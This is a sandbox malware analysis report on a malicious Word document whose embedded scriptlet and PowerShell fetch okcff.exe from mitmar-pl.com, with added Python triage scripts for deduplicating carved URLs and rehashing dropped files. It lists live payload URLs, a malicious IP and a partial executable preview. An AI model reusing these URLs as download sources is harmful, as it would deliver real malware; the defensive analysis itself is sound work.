http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | powershell.exe, 00000003.00000002.437210048.00000000023B0000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.438620831.0000000002450000.00000002.00020000.sdmp, okcff.exe, 00000009.00000002.624048048.0000000004D70000.00000002.00020000.sdmp | false | - | high
httP://mitmar-pl.com/okcff.exePE | powershell.exe, 00000003.00000002.440935004.000000000371C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/mgravell/protobuf-neti | okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp | false | - | high
http://mitmar-pl.com | powershell.exe, 00000003.00000002.440935004.000000000371C000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.441337667.0000000003819000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://stackoverflow.com/q/11564914/23354; | okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp | false | - | high
https://stackoverflow.com/q/2152978/23354 | okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp | false | - | high
http://investor.msn.com/ | notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmp | false | - | high
http://www.%s.comPA | powershell.exe, 00000003.00000002.437210048.00000000023B0000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.438620831.0000000002450000.00000002.00020000.sdmp, okcff.exe, 00000009.00000002.624048048.0000000004D70000.00000002.00020000.sdmp | false | URL Reputation: safe | low
httP://mitmar-pl.com/ok | powershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://www.piriform.com/ccleanerv | powershell.exe, 00000005.00000002.438200981.00000000003EF000.00000004.00000020.sdmp | false | - | high
https://google.com | okcff.exe | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | okcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmp | false | - | high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623598488.00000000034DF000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
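The memory-carved strings above are not clean IOCs: the same download URL appears with a mixed-case scheme, truncated ("okcff.ex", "ok") and with bytes over-read from adjacent memory ("okcff.exePE", "Crkrqdrd.jpegi", "google.comD"). The script below is an added example for this report, not Joe Sandbox code: it attributes each carved string to a URL from the Contacted URLs table when one is a prefix of the other, falls back to the domain when more than one contacted URL qualifies, and leaves strings outside the contacted domain unmapped rather than guessing. The input list is a subset copied from the table; the prefix rule is my own heuristic.

```python
"""Collapse URL strings carved from process memory onto the URLs and domain
that were actually contacted, so the IOC list is not padded with truncated
or over-read copies. Added example for this report; not Joe Sandbox code.
The prefix-matching rule below is my own heuristic, not the sandbox's."""
from urllib.parse import urlsplit, urlunsplit

# Ground truth from the "Contacted Domains" / "Contacted URLs" tables above.
CONTACTED_DOMAINS = {"mitmar-pl.com"}
CONTACTED_URLS = ["http://mitmar-pl.com/okcff.exe", "http://mitmar-pl.com/Crkrqdrd.jpeg"]

# (carved string, process it was carved from): a subset copied from the
# "URLs from Memory and Binaries" table. Note the mixed-case scheme,
# truncated tails ("okcff.ex", "ok") and over-read tails ("exePE", "jpegi", "comD").
MEMORY_STRINGS = [
    ("httP://mitmar-pl.com/okcff.ex", "powershell.exe"),
    ("httP://mitmar-pl.com/okcff.exe", "powershell.exe"),
    ("httP://mitmar-pl.com/okcff.exePE", "powershell.exe"),
    ("httP://mitmar-pl.com/ok", "powershell.exe"),
    ("http://mitmar-pl.com", "powershell.exe"),
    ("http://mitmar-pl.com/Crkrqdrd.jpegi", "okcff.exe"),
    ("https://google.comD", "okcff.exe"),
    ("https://github.com/mgravell/protobuf-netJ", "okcff.exe"),
    ("http://www.%s.comPA", "powershell.exe"),
]


def normalize(url: str) -> str:
    """Scheme and host are case-insensitive; the path is not, so it is kept as-is."""
    p = urlsplit(url)
    return urlunsplit((p.scheme.lower(), p.netloc.lower(), p.path, p.query, p.fragment))


def host_of(url: str) -> str:
    return (urlsplit(url).hostname or "").lower()


def classify(memory_strings, contacted_urls, contacted_domains) -> dict:
    """Attribute each carved string to exactly one contacted URL when the two are
    prefix-related (one is a truncated or over-read copy of the other). If several
    contacted URLs qualify (e.g. a bare "http://host"), record only the domain;
    strings outside the contacted domains are left unmapped, not guessed."""
    canon = [normalize(u) for u in contacted_urls]
    iocs, domain_only, other = {}, {}, []
    for raw, proc in memory_strings:
        s = normalize(raw)
        host = host_of(s)
        if host not in contacted_domains:
            other.append(raw)
            continue
        hits = [c for c in canon if c.startswith(s) or s.startswith(c)]
        if len(hits) == 1:
            iocs.setdefault(hits[0], set()).add(proc)
        else:
            domain_only.setdefault(host, set()).add(proc)
    return {
        "iocs": {u: sorted(p) for u, p in iocs.items()},
        "domain_only": {h: sorted(p) for h, p in domain_only.items()},
        "other": other,
    }


if __name__ == "__main__":
    import json
    print(json.dumps(classify(MEMORY_STRINGS, CONTACTED_URLS, CONTACTED_DOMAINS), indent=2))
```

Matching against what actually crossed the wire, rather than deduplicating the carved strings against each other, is the point: exact-match dedup keeps every over-read variant as a separate "URL", while a looser fuzzy match would happily glue "http://mitmar-pl.com" onto one of the two files when the string alone does not say which.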

                                                          Contacted IPs


                                                          Public

IP | Domain | Country | ASN | ASN Name | Malicious
37.0.9.166 | mitmar-pl.com | Netherlands | 198301 | WKD-ASIE | true

                                                          General Information

                                                          Joe Sandbox Version:34.0.0 Boulder Opal
                                                          Analysis ID:553100
                                                          Start date:14.01.2022
                                                          Start time:10:22:19
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 10m 37s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:light
                                                          Sample file name:478644.doc
                                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:43
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.troj.expl.evad.winDOC@53/21@4/1
                                                          EGA Information:
                                                          • Successful, ratio: 25%
                                                          HDC Information:
                                                          • Successful, ratio: 0.9% (good quality ratio 0.8%)
                                                          • Quality average: 64.2%
                                                          • Quality standard deviation: 30.7%
                                                          HCA Information:
                                                          • Successful, ratio: 99%
                                                          • Number of executed functions: 0
                                                          • Number of non-executed functions: 0
                                                          Cookbook Comments:
                                                          • Adjust boot time
                                                          • Enable AMSI
                                                          • Found application associated with file extension: .doc
                                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                                          • Attach to Office via COM
                                                          • Active ActiveX Object
                                                          • Scroll down
                                                          • Close Viewer
                                                          Warnings:
                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe
                                                          • TCP Packets have been reduced to 100
                                                          • Execution Graph export aborted for target okcff.exe, PID 2176 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 1308 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 2904 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                          Simulations

                                                          Behavior and APIs

Time | Type | Description
10:22:29 | API Interceptor | 95x Sleep call for process: powershell.exe modified
10:22:35 | API Interceptor | 722x Sleep call for process: okcff.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          No context

                                                          Domains

                                                          No context

                                                          ASN

                                                          No context

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okcff[1].exe
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:downloaded
                                                          Size (bytes):194560
                                                          Entropy (8bit):4.668942832070624
                                                          Encrypted:false
                                                          SSDEEP:1536:QLwio+gEPHeB9PYR0uQ7nXhMM70iOVcse5m6h:rt+gIHeB9PYRnQL6S5
                                                          MD5:E9416A322E9A796D45588BC4FB04CD45
                                                          SHA1:8D261D205C8D34A4A24B713DD6B9585647B8BDEB
                                                          SHA-256:F2DA177AFF59093ABE1D3BC7C1A769BE2701784036C398900A43725D83C9E9A9
                                                          SHA-512:9A1FF2B39DFD93D3B6EAED4685876E8BF877BD1695FDC7095B74ABEADAFBAEE785815FEB75585D31299B3D0A18B5E88890DA942D65F407171C28CAF66655C5AE
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          IE Cache URL:http://mitmar-pl.com/okcff.exe
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Y................0..T..........Ns... ........@.. .......................@............@..................................s..K.......X.................... ....................................................... ............... ..H............text...TS... ...T.................. ..`.rsrc...X............V..............@..@.reloc....... ......................@..B................0s......H........B.../..........Hr...............................................0...........r...p(....(.....(......(.....*..0..Q....... ......$.8......$.E........................S...............c...........^...........7...>...2...................(...................[...........m...8.....8M... ....~_...:....& ....8......(.E........q.......^...8............io....8......./(....:8... ....8......,.....(....(.....* ....~h...9....& ....8...../(....t......8....(.....*(...... ....~....9]...&
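The fields in the record above (size, 8-bit entropy, MD5/SHA-1/SHA-256/SHA-512, and the "PE32 ... Mono/.Net assembly" type) can be re-derived from a quarantined copy before the hashes are pivoted on elsewhere. The script below is an added example for this report, not Joe Sandbox code. The PE check walks MZ, e_lfanew, the optional header and data directory 14 (the CLR header) by hand; the header-only PE32 image built by `build_fake_pe32` is constructed test input, not the sample.

```python
"""Static triage of a dropped file: re-derives size, 8-bit entropy, hashes
and a PE / .NET check, the same properties this report lists per file.
Added example for this report; not Joe Sandbox code."""
import hashlib
import math
import struct
import sys


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 for constant data, 8.0 for uniform)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def pe_info(data: bytes) -> dict:
    """Minimal PE header walk: MZ -> e_lfanew -> PE\\0\\0 -> optional header ->
    data directory 14 (IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, the CLR header).
    A non-zero CLR directory is what marks the file as a .NET assembly."""
    info = {"is_pe": False, "pe32_plus": None, "dotnet": False}
    try:
        if data[:2] != b"MZ":
            return info
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
            return info
        info["is_pe"] = True
        opt = e_lfanew + 4 + 20                      # skip signature + 20-byte COFF file header
        magic = struct.unpack_from("<H", data, opt)[0]
        info["pe32_plus"] = (magic == 0x20B)
        # NumberOfRvaAndSizes sits right before the data directories:
        # offsets 92/96 in PE32, 108/112 in PE32+.
        dirs = opt + (112 if info["pe32_plus"] else 96)
        num_dirs = struct.unpack_from("<I", data, dirs - 4)[0]
        if num_dirs > 14:
            clr_rva, clr_size = struct.unpack_from("<II", data, dirs + 14 * 8)
            info["dotnet"] = clr_rva != 0 and clr_size != 0
    except struct.error:
        pass                                         # truncated header: report what was found
    return info


def triage(data: bytes) -> dict:
    """The per-file fields from the report, recomputed from raw bytes."""
    return {
        "size": len(data),
        "entropy": shannon_entropy(data),
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "sha512": hashlib.sha512(data).hexdigest().upper(),
        **pe_info(data),
    }


def build_fake_pe32(dotnet: bool) -> bytes:
    """Constructed test input: a header-only PE32 image. NOT the sample, not runnable."""
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)                        # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x0102)  # i386, 224-byte optional header
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                          # PE32 magic
    struct.pack_into("<I", opt, 92, 16)                            # NumberOfRvaAndSizes
    if dotnet:
        struct.pack_into("<II", opt, 96 + 14 * 8, 0x2008, 0x48)    # CLR header RVA / size
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    # Usage: python triage.py <quarantined file>; with no argument it runs on the fake image.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_fake_pe32(dotnet=True)
    for k, v in triage(blob).items():
        print(f"{k}: {v}")
```

Entropy around 4.7, as listed for okcff[1].exe, is what an unpacked .NET assembly with a large embedded resource typically shows; a packed or encrypted payload would sit near 7.5 and above, which is the cue to look for a second stage rather than at this file's own code.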
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\570DA74A.wmf
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:Targa image data - Map - RLE 1569 x 65536 x 0 +2 "\005"
                                                          Category:dropped
                                                          Size (bytes):3712
                                                          Entropy (8bit):5.036435545575714
                                                          Encrypted:false
                                                          SSDEEP:96:Gk7Hgwj+mbYf3LSrhlOs0f5aSdHn63Dx3:Gk7Awam8fI4s0f5ap3
                                                          MD5:F238B72FF240B9EA28769FFFB0C11843
                                                          SHA1:54EDB9197B4A4C9C3CFFF894A83174DD17DDA9D2
                                                          SHA-256:A37AE38F17314E0B3C0967F597285E9EC9CA175B6DC223ECF76BC6CE79586E05
                                                          SHA-512:4AA9A9EF5432C866F996679D58358CC02DF2CF07346AA030E643EB70258957058EBE10E0EF7CA7E6B41DECE1C99539B738864A24D9DD118E60206263C17620DB
                                                          Malicious:false
                                                          Preview: ......@.....!.....................5...........................Segoe UI....C.-.....@..........R....-...........................A..... . ..... . ...:.(... ...@.............................................................................................................................................................................................................................................................................................?.........!...A.F.f. . ..... . ...:.(... ... ................................................................................................................................................................................................................................................................................................................................G .>..:..9..8..8..8..9..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:.i2........K..S(.O$.N!.N!.N!.N!.N".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".N".M".M".O$.S).O".......l
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7CE2D32D.png
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:370 sysV pure executable
                                                          Category:dropped
                                                          Size (bytes):262160
                                                          Entropy (8bit):0.05136362991589137
                                                          Encrypted:false
                                                          SSDEEP:48:YpVMBmYIjDBgdEJdOcfd/Xdd/u9N7zGkqfoQ6eI:Yp/zb+HGffFE
                                                          MD5:A8A92E1C3D97E40596840C5045F94F67
                                                          SHA1:B2B4FB6D579C92F649582F63CC89D7B190AD8025
                                                          SHA-256:2C26843633ABB38F10B1D93AF2D96AC746C7C060EF69E06B113707F3F7FE8E74
                                                          SHA-512:048BAC628842FFEB7A9D218F3E680D38267A3FADA8DFED6DE1C60FA4F7D3BF7B8FA2681D0393D6A7520AE1F594E9649B470550B4344082B3FCDA62AF6A82E112
                                                          Malicious:false
                                                          Preview: X.........E.....W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.W.b.e.m.;.C.:.\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l.l.\.v.1...0.\...P.A.T.H.E.X.T.=...C.O.M.;...E.X.E.;...B.A.T.;...C.M.D.;...V.B.S.;...V.B.E.;...J.S.;...J.S.E.;...W.S.F.;...W.S.H.;...M.S.C...P.R.O.C.E.S.S.O.R._.A.R.C.H.I.T.E.C.T.U.R.E.=.A.M.D.6.4...P.R.O.C.E.S.S.O.R._.I.D.E.N.T.I.F.I.E.R.=.I.n.t.e.l.6.4. .F.a.m.i.l.y. .6. .M.o.d.e.l. .8.5. .S.t.e.p.p.i.n.g. .7.,. .G.e.n.u.i.n.e.I.n.t.e.l...P.R.O.C.E.S.S.O.R._.L.E.V.E.L.=.6...P.R.O.C.E.S.S.O.R._.R.E.V.I.S.I.O.N.=.5.5.0.7...P.r.o.g.r.a.m.D.a.t.a.=.C.:.\.P.r.o.g.r.a.m.D.a.t.a...P.r.o.g.r.a.m.F.i.l.e.s.=.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s...P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).=.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...P.r.o.g.r.a.m.W.6.4.3.2.=.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s...P.S.M.o.d.u.l.e.P.a.t.h.=.C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l.l.\.v.1...0.\.M.o.d.u.l.e.s.\.;.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.u.t.o.I.
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                          Category:dropped
                                                          Size (bytes):212992
                                                          Entropy (8bit):4.7464056683239715
                                                          Encrypted:false
                                                          SSDEEP:3072:QbzakaBa9aRaOa2TF7sbzakaBa9aRaOa2TF7:KzakaBa9aRaOa2TozakaBa9aRaOa2T
                                                          MD5:D7EF29F80097BDF434F81F076289F2D4
                                                          SHA1:231DCAD0641F6DDF6D28A89D9AAF4102B261E693
                                                          SHA-256:8451756E2D56C1A430FCABA7DB51CF20ADEA6B83DB858E18AF6ABE4441238EA9
                                                          SHA-512:0454576AB79FAC0588046D19ACD5C562B7295C34C98C579E62D3667AADF72F6A31A5C68EFA736DBCDEE0A1F5FC30468CDFD5A6A25C00900FB22D7AF7D6D36DD2
                                                          Malicious:false
                                                          Preview: ......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4FAE5255-02F9-464D-A70F-CC3F2B77B94E}.tmp
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1536
                                                          Entropy (8bit):1.3573187972516119
                                                          Encrypted:false
                                                          SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbG:IiiiiiiiiifdLloZQc8++lsJe1Mzl/n
                                                          MD5:21C2AF2BB9957FFECAD589E76FF8BA89
                                                          SHA1:08DDE72BB9349A555263E85CCDC477DB202E85FE
                                                          SHA-256:79586CFF1216985B54C69EC7D60FEB94DE375C824B633C32151F883FC4822991
                                                          SHA-512:CADC111BE5DA804F427AB8B4CF9652F09223A9BD2B220376D1E88CCD78A37A159C6B79A2DEF38E5D0D0B25D7402FA5B1721CEFECF35C6EF51DA46290A2C06D1F
                                                          Malicious:false
                                                          Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5349C035-C6A0-4C16-B632-E1A36FB414FC}.tmp
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1024
                                                          Entropy (8bit):0.05390218305374581
                                                          Encrypted:false
                                                          SSDEEP:3:ol3lYdn:4Wn
                                                          MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                          Malicious:false
                                                          Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8C959E4C-92E1-4241-AA94-1568DABC6F24}.tmp
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):44016
                                                          Entropy (8bit):2.8832027230024
                                                          Encrypted:false
                                                          SSDEEP:768:IT/3ViFs0Dqeb4Zep84JtueJvCI19rIwzWSgUg4P58F:AFia0Dqeb0nstw29rVzWSgm58F
                                                          MD5:D320E2636A4FE368F1DD1721A88C0B72
                                                          SHA1:6DE8E522B7C191677F9A8668BFF895F3E7E0FB64
                                                          SHA-256:C73D18662DFD69AABA06F46A599560EC230124395B678230C4F0F8DFE83CA475
                                                          SHA-512:9B27E59DE735F81C7766AC2439057D6433D424C7CFF333274DE3736CCEA492BCFF08A6D0D3183E480CCB78040993DC00A174E3D5C444E63AD1E9FDEA28D501EB
                                                          Malicious:false
                                                          Preview: c.0.5.=......... .P.a.c.k.a.g.e.E.M.B.E.D.W.o.r.d...D.o.c.u.m.e.n.t...8.........=....... .\.a. .W.o.r.d...D.o.c.u.m.e.n.t...8. .".%.T.M.P.%.\.\.a.b.d.t.f.h.g.h.g.e.g.h.D.p.~...S.C.T.". .".e.w.:.{.0.0.0.0.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.0.0.0.0.0.0.0.0.}.".L.I.N.K.8.7.e.9.4.e.f.e.c.e.9.7.0.2.e.d.4.1.f.4.5.9.e.b.e.d.9.e.f.e.2.5.8.9.5.0.4.e.4.7.0.......................................................................................................................................................................H...R...X............................................................................................................................................................................................................................................................................................................................................................................................CJ..OJ..QJ..^J..aJ.....j....CJ..OJ..QJ..U..^J..aJ.. .ja.e...CJ..OJ..QJ..U..^J..aJ.
                                                          C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):96978
                                                          Entropy (8bit):4.476034550957548
                                                          Encrypted:false
                                                          SSDEEP:768:+abzakaBa9aRaOa2O2jOLWRoNVYwUn7ZwPW1DGJ:+abzakaBa9aRaOa2TENa7A
                                                          MD5:30DD770655427043A65B4CA45F7443C6
                                                          SHA1:3BBC7640A0D21F941D342532405FE6B62BC1C423
                                                          SHA-256:C48F7949E36EA00828F752C9A5A2BAA48FA6F867BA9013025B6D6CB858F31768
                                                          SHA-512:188F28CC8E3FB2C14F34360BDD0CD137B17162DA59017A9C42E9559837ECBE56BE290A93B715E3F2F3F1CF7CC28343CDC497E6EA0303275530D450C3204B63BE
                                                          Malicious:true
                                                          Preview: .............................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT:Zone.Identifier
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:gAWY3n:qY3n
                                                          MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                          SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                          SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                          SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                          Malicious:false
                                                          Preview: [ZoneTransfer]..ZoneId=3..
                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\478644.LNK
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:56 2021, mtime=Mon Aug 30 20:08:56 2021, atime=Fri Jan 14 17:22:23 2022, length=392070, window=hide
                                                          Category:dropped
                                                          Size (bytes):992
                                                          Entropy (8bit):4.516683865071603
                                                          Encrypted:false
                                                          SSDEEP:12:8Cr1I0gXg/XAlCPCHaXjByB/AVtX+WLUyVNicvbMK5DtZ3YilMMEpxRljKPtt6Tg:8nk/XTTc+bRUM0ef5Dv3qwtiR7m
                                                          MD5:0F74FC3AD8670059320D5A7767BB0A3E
                                                          SHA1:6305BC2235CB1924EAB45008C8B4FD0BB9B6CFF9
                                                          SHA-256:132354D2946AB264EFA224DF2AE58E9BA7FB67122F3672BC8F6A564CBF8C609A
                                                          SHA-512:207815791EB8572911BF33A0E4B5E2AE24A53D8514210F170BBF345D57847D4A4BEA7924B2ABFE92A76631763A0D1A34EE980A29A9ADEA4B14B3484F16D66B89
                                                          Malicious:false
                                                          Preview: L..................F.... ....y>....y>....^.s................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S....user.8......QK.X.S..*...&=....U...............A.l.b.u.s.....z.1......S ...Desktop.d......QK.X.S .*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....\.2......T. .478644.doc..B.......S...S..*.........................4.7.8.6.4.4...d.o.c.......t...............-...8...[............?J......C:\Users\..#...................\\506013\Users.user\Desktop\478644.doc.!.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.4.7.8.6.4.4...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......506013..........D_....3N...W...9..g............[D_....3N...W...9..g............[....
                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):63
                                                          Entropy (8bit):4.548497884319839
                                                          Encrypted:false
                                                          SSDEEP:3:bDuMJlSLjomX1RuT3Ljov:bCLjC7jy
                                                          MD5:0BF65FC4D2E1FE20737B46427E7DB0D2
                                                          SHA1:F210ABEDA65F65C2DE79F07D3049C4C5DB489CF6
                                                          SHA-256:612DDD432589CB1586BEE2B9173D880A3E1FDBA888D40DB2D8D8F6AE9A96E186
                                                          SHA-512:0D5CC6582ECCF2E8CC0E1B19CBEB72AC621306D1DABB3BCD89B09BBE309D00788EE3858E9607FBA56456EC354C3B0D9E87BC10F94B36994F61ECC3ED546B6743
                                                          Malicious:false
                                                          Preview: [folders]..Templates.LNK=0..478644.LNK=0..[doc]..478644.LNK=0..
                                                          C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
